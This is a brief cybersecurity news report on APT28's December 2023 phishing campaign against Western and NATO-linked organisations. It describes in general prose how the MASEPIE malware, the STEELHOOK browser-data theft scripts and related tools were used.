GitHub has launched a major initiative to strengthen the security of its software supply chain.
736 
APT28, also known as Fancy Bear and Strontium, which has the support of the Russian state, has been identified as the main perpetrator of a series of cyber attacks against government organizations, businesses, educational institutions and research institutes of the West and NATO agencies. The attacks in question took place between December 15 and 25, 2023, and involved phishing emails that tricked recipients into clicking on a link that purported to lead to an important document.
The redirects were to a malicious web resource that used JavaScript to download a Windows Shortcut (LNK) file and called a PowerShell command to launch a new malware named “MASEPIE.” This caused a chain reaction of downloading other malware.
MASEPIE establishes persistence in infected systems by modifying the Windows registry and adding a shortcut file with a misleading name to the Windows startup folder, making it difficult to remove. Using PowerShell scripts called “STEELHOOK” to steal data from Chrome-based web browsers allows attackers to obtain sensitive information such as passwords and browsing history. Other tools, including OCEANMAP and IMPACKET, are used for long-term system access and attack control.
736 
827 
911